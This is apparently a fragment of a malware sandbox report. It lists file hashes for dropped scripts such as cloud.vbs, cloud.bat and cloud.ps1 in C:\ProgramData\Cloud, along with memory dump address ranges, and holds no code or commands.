SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8d089c855358969266a3275f0ec4f955
SHA1 5ce30b598cfa0c2008541b1b549673401971dc3d
SHA256 e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734
SHA512 f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320

memory/2232-32-0x00007FFC74440000-0x00007FFC74F01000-memory.dmp

C:\ProgramData\Cloud\cloud.vbs

MD5 7079642a22a106d0ed6f227cc70899ae
SHA1 60dd57af3518c0ea4104379ad233b5982b231283
SHA256 b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724
SHA512 ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80

C:\ProgramData\Cloud\cloud.bat

MD5 b8bdfc7895feaaacba3711d17be6778a
SHA1 fa0bc12827b348fe540a13683897deb207650df7
SHA256 e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3
SHA512 ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156

C:\ProgramData\Cloud\cloud.ps1

MD5 81fe8fe5684ecf16d936250bb94c852a
SHA1 a0a18d8d75e12546baa0b7dfd0dfb02dbefbac40
SHA256 ca0713d77d71359ff692385a2bb92e0b22fe7f0db9a356fd4ffbbfeb34911584
SHA512 d0a35efecc947e2e5d99d3f58a494693d5ebd48635f749f87f341e0a1ce965b7a413754a0316c973eebac4c8e8a12315a916adbc4350a0819132debde1ea7013

memory/3196-46-0x00000200F2910000-0x00000200F291E000-memory.dmp

memory/3308-47-0x0000000000F00000-0x0000000000F18000-memory.dmp

memory/3308-49-0x0000000005640000-0x0000000005656000-memory.dmp

memory/3308-50-0x0000000005F50000-0x00000000064F4000-memory.dmp

memory/3308-51-0x0000000005B50000-0x0000000005BE2000-memory.dmp

memory/3308-52-0x0000000005B40000-0x0000000005B4A000-memory.dmp

memory/3308-53-0x0000000006740000-0x00000000067DC000-memory.dmp

memory/3308-54-0x00000000067E0000-0x0000000006846000-memory.dmp